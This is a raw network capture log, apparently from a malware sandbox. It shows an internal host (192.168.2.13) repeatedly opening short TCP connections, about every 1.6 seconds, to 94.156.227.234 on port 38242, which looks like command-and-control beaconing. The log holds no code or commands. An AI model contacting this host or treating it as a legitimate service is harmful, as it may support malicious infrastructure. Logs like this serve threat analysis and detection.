                                                                          Dec 24, 2024 05:27:55.089425087 CET4455238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:55.208955050 CET382424455294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:55.209017992 CET4455238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:55.209058046 CET4455238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:55.328663111 CET382424455294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:55.714939117 CET4455238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:55.880108118 CET382424455294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:56.332833052 CET382424455294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:56.332912922 CET4455238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:56.716280937 CET4455438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:56.835938931 CET382424455494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:56.835998058 CET4455438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:56.836011887 CET4455438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:56.955486059 CET382424455494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:57.341833115 CET4455438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:57.508191109 CET382424455494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:57.965509892 CET382424455494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:57.965575933 CET4455438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:58.342684031 CET4455638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:58.462268114 CET382424455694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:58.462327003 CET4455638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:58.462341070 CET4455638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:58.581908941 CET382424455694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:58.967091084 CET4455638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:59.129300117 CET382424455694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:59.138780117 CET48202443192.168.2.13185.125.190.26
                                                                          Dec 24, 2024 05:27:59.587486029 CET382424455694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:27:59.587568998 CET4455638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:27:59.967977047 CET4455838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:00.087702036 CET382424455894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:00.087776899 CET4455838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:00.087928057 CET4455838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:00.207623005 CET382424455894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:00.592570066 CET4455838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:00.756314993 CET382424455894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:01.210496902 CET382424455894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:01.210561037 CET4455838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:01.593491077 CET4456038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:01.713202000 CET382424456094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:01.713310003 CET4456038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:01.713458061 CET4456038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:01.833062887 CET382424456094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:02.218744993 CET4456038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:02.384159088 CET382424456094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:02.840934992 CET382424456094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:02.841020107 CET4456038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:03.208098888 CET382424456094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:03.208157063 CET4456038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:03.219780922 CET4456238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:03.377769947 CET382424456094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:03.377849102 CET382424456294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:03.377929926 CET4456238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:03.378088951 CET4456238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:03.497637987 CET382424456294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:03.883119106 CET4456238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:04.044162989 CET382424456294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:04.502762079 CET382424456294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:04.502826929 CET4456238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:04.884133101 CET4456438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:05.003772020 CET382424456494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:05.003843069 CET4456438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:05.003859043 CET4456438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:05.123624086 CET382424456494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:05.508536100 CET4456438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:05.676134109 CET382424456494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:06.125426054 CET382424456494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:06.125519037 CET4456438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:06.509434938 CET4456638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:06.629014969 CET382424456694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:06.629132986 CET4456638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:06.629153967 CET4456638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:06.748744965 CET382424456694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:07.134072065 CET4456638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:07.324106932 CET382424456694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:07.755400896 CET382424456694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:07.755587101 CET4456638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:08.134865046 CET4456838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:08.406043053 CET382424456894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:08.406205893 CET4456838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:08.406205893 CET4456838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:08.643914938 CET382424456894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:08.909595966 CET4456838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:09.076132059 CET382424456894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:09.675071001 CET382424456894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:09.675141096 CET4456838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:09.910396099 CET4457038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:10.034749031 CET382424457094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:10.034939051 CET4457038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:10.034939051 CET4457038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:10.158025026 CET382424457094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:10.538116932 CET4457038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:10.700304985 CET382424457094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:11.173908949 CET382424457094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:11.174022913 CET4457038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:11.538783073 CET4457238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:11.658401966 CET382424457294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:11.658483028 CET4457238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:11.658514977 CET4457238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:11.778052092 CET382424457294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:12.162123919 CET4457238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:12.324255943 CET382424457294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:12.777756929 CET382424457294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:12.777858019 CET4457238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:13.162749052 CET4457438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:13.282370090 CET382424457494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:13.282562971 CET4457438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:13.282597065 CET4457438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:13.402153015 CET382424457494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:13.785788059 CET4457438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:13.952141047 CET382424457494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:14.415518999 CET382424457494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:14.415591955 CET4457438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:14.786518097 CET4457638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:14.906131983 CET382424457694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:14.906276941 CET4457638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:14.906305075 CET4457638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:15.026223898 CET382424457694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:15.409382105 CET4457638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:15.572288036 CET382424457694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:16.040714979 CET382424457694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:16.040796041 CET4457638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:16.410470963 CET4457838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:16.530014992 CET382424457894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:16.530138016 CET4457838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:16.530155897 CET4457838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:16.649728060 CET382424457894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:17.033380032 CET4457838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:17.196094036 CET382424457894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:17.650151014 CET382424457894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:17.650254965 CET4457838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:18.034014940 CET4458038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:18.153846979 CET382424458094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:18.153930902 CET4458038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:18.153959036 CET4458038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:18.273621082 CET382424458094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:18.657224894 CET4458038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:18.824228048 CET382424458094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:19.281712055 CET382424458094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:19.281799078 CET4458038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:19.657746077 CET4458238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:19.777414083 CET382424458294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:19.777482033 CET4458238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:19.777497053 CET4458238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:19.897015095 CET382424458294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:20.280227900 CET4458238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:20.440078974 CET382424458294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:20.920861959 CET382424458294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:20.920989990 CET4458238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:21.280827045 CET4458438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:21.400444984 CET382424458494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:21.400535107 CET4458438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:21.400536060 CET4458438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:21.520138025 CET382424458494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:21.903487921 CET4458438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:22.064205885 CET382424458494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:22.539412975 CET382424458494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:22.539499044 CET4458438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:22.904066086 CET4458638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:23.023650885 CET382424458694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:23.023749113 CET4458638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:23.023750067 CET4458638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:23.143373013 CET382424458694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:23.526845932 CET4458638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:23.804032087 CET382424458694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:24.153624058 CET382424458694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:24.153820038 CET4458638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:24.527493954 CET4458838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:24.650718927 CET382424458894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:24.650779009 CET4458838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:24.650803089 CET4458838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:24.891165972 CET382424458894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:25.153983116 CET4458838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:25.332433939 CET382424458894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:25.893611908 CET382424458894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:25.893748045 CET4458838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:26.154571056 CET4459038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:26.274276018 CET382424459094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:26.274369955 CET4459038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:26.274369955 CET4459038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:26.393985987 CET382424459094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:26.777656078 CET4459038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:26.940071106 CET382424459094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:27.397372007 CET382424459094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:27.397443056 CET4459038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:27.778331041 CET4459238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:27.897862911 CET382424459294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:27.897945881 CET4459238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:27.897970915 CET4459238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:28.017602921 CET382424459294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:28.401782990 CET4459238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:28.564060926 CET382424459294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:29.019221067 CET382424459294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:29.019300938 CET4459238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:29.402482033 CET4459438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:29.522042036 CET382424459494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:29.522106886 CET4459438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:29.522135019 CET4459438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:29.641721010 CET382424459494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:29.858684063 CET48202443192.168.2.13185.125.190.26
                                                                          Dec 24, 2024 05:28:30.025569916 CET4459438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:30.188075066 CET382424459494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:30.655333042 CET382424459494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:30.655400991 CET4459438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:31.026345968 CET4459638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:31.145992041 CET382424459694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:31.146070957 CET4459638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:31.146095037 CET4459638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:31.265717030 CET382424459694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:31.650075912 CET4459638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:31.812097073 CET382424459694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:32.271430016 CET382424459694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:32.271497011 CET4459638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:32.650779963 CET4459838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:32.770394087 CET382424459894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:32.770509958 CET4459838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:32.770570993 CET4459838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:32.890121937 CET382424459894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:33.273893118 CET4459838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:33.436047077 CET382424459894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:33.898958921 CET382424459894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:33.899027109 CET4459838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:34.274550915 CET4460038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:34.394114971 CET382424460094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:34.394188881 CET4460038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:34.394205093 CET4460038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:34.513866901 CET382424460094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:34.897120953 CET4460038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:35.064191103 CET382424460094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:35.523205996 CET382424460094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:35.523372889 CET4460038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:35.897819042 CET4460238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:36.017383099 CET382424460294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:36.017462015 CET4460238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:36.017482042 CET4460238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:36.137180090 CET382424460294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:36.520298004 CET4460238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:36.680008888 CET382424460294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:37.152318001 CET382424460294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:37.152415037 CET4460238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:37.521106958 CET4460438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:37.641555071 CET382424460494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:37.641623020 CET4460438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:37.641623020 CET4460438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:37.761229992 CET382424460494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:38.145210028 CET4460438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:38.312045097 CET382424460494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:38.761428118 CET382424460494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:38.761491060 CET4460438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:39.146081924 CET4460638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:39.265629053 CET382424460694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:39.265719891 CET4460638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:39.265739918 CET4460638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:39.385458946 CET382424460694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:39.769382000 CET4460638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:39.931989908 CET382424460694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:40.390816927 CET382424460694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:40.390954018 CET4460638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:40.770415068 CET4460838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:40.890085936 CET382424460894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:40.890327930 CET4460838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:40.890342951 CET4460838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:41.009854078 CET382424460894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:41.394176006 CET4460838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:41.632061958 CET382424460894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:42.007344961 CET382424460894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:42.007658958 CET4460838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:42.395282030 CET4461038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:42.587893963 CET382424461094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:42.587990999 CET4461038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:42.588130951 CET4461038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:42.712778091 CET382424461094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:43.093828917 CET4461038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:43.256025076 CET382424461094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:43.714932919 CET382424461094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:43.715131998 CET4461038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:44.095268965 CET4461238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:44.215167046 CET382424461294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:44.215370893 CET4461238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:44.215538979 CET4461238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:44.335417986 CET382424461294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:44.721468925 CET4461238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:44.884149075 CET382424461294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:45.346409082 CET382424461294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:45.346827030 CET4461238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:45.723202944 CET4461438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:45.842859030 CET382424461494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:45.843005896 CET4461438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:45.843161106 CET4461438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:45.962672949 CET382424461494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:46.350378990 CET4461438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:46.515949011 CET382424461494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:46.970968008 CET382424461494.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:46.971416950 CET4461438242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:47.352121115 CET4461638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:47.471698999 CET382424461694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:47.471962929 CET4461638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:47.471962929 CET4461638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:47.592130899 CET382424461694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:47.977750063 CET4461638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:48.139995098 CET382424461694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:48.589792967 CET382424461694.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:48.590094090 CET4461638242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:48.979079962 CET4461838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:49.098790884 CET382424461894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:49.098927021 CET4461838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:49.098948002 CET4461838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:49.220046043 CET382424461894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:49.604770899 CET4461838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:49.768037081 CET382424461894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:50.224653959 CET382424461894.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:50.224739075 CET4461838242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:50.606537104 CET4462038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:50.726959944 CET382424462094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:50.727188110 CET4462038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:50.727188110 CET4462038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:50.847007990 CET382424462094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:51.233243942 CET4462038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:51.395998955 CET382424462094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:51.854176044 CET382424462094.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:51.854389906 CET4462038242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:52.234493971 CET4462238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:52.354147911 CET382424462294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:52.354423046 CET4462238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:52.354515076 CET4462238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:52.473977089 CET382424462294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:52.859731913 CET4462238242192.168.2.1394.156.227.234
                                                                          Dec 24, 2024 05:28:53.020025015 CET382424462294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:53.480873108 CET382424462294.156.227.234192.168.2.13
                                                                          Dec 24, 2024 05:28:53.481030941 CET4462238242192.168.2.1394.156.227.234
